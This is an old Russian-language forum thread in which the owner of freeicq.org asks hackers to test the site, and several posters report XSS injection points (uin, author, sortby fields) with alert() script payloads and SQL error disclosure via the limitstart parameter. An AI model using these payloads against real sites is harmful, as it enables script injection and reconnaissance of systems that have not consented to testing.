Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   freeicq.org (https://forum.antichat.xyz/showthread.php?t=39754)

404 07.05.2007 22:31

freeicq.org
 
Сайта freeicq.org

найдите уязвимость,если она конечно есть :)
кто найдёт буду дарить по 1+ каждый день :D

Go0o$E 07.05.2007 22:51

Xss при добавлении номера icq в параметре uin.
Цитата:

POST http://freeicq.org/index.php
add_uin=1&add_submit=1&uin="><script>alert(/XSS/)</script>&pass=&uinpass_list=&author=&action=save&Su bmit=%C4%EE%E1%E0%E2%E8%F2%FC

Ksander 07.05.2007 23:30

Чегото я в шапке не вижу логотип ачата.

Rebz 07.05.2007 23:35

слабое звено - форум.

freddi 07.05.2007 23:36

активная хсс, уязвимо поле "автор" при добавлении номера, отображается в
http://freeicq.org/index.php?list=uncheckers

[53x]Shadow 08.05.2007 01:50

Код:

http://freeicq.org/index.php?limitstart=-1
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /usr/home/raider/domains/freeicq.org/public_html/index.php on line 229

Там все в поряде, только имхо лучше выдавать что нидь типа "по вашему запросу ничего не найдено" чтоб базу не раскрывать сразу.

-=lebed=- 08.05.2007 02:52

http://freeicq.org/index.php?limitstart=54000000000000000000000000 - тож надо имхо выдавать что-нибудь другое чем это:
Код:

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /usr/home/raider/domains/freeicq.org/public_html/index.php on line 229

Dracula4ever 08.05.2007 09:09

Я нашел XSS у тебя на сайте в разделе "Добавление номера в базу".
Я написал в номере,Пароле,Списке (uin;pass)и Авторе вразу
PHP код:

"><script>alert()</script> 


Slon 08.05.2007 17:01

Кстати интересная фишка. (наверное не совсем уязвимость но всеже) Введи в логине всякую фигню и будет
Цитата:

Неправильный логин
А попробуй ввести логин 0 пароль 0
такого не будет. Буду копать дальше

BlackCats 12.05.2007 19:14

http://freeicq.org/index.php?add_uin=1
в полях номер и список номеров - xss

http://freeicq.org/index.php?checkscore=1
в обоих полях xss

http://freeicq.org/index.php?limitstart=0&sort=numbers&sortby="><scri pt>alert(99)</script>
xss
(осторожно, последнем вылетаеет много алертов)


Время: 05:44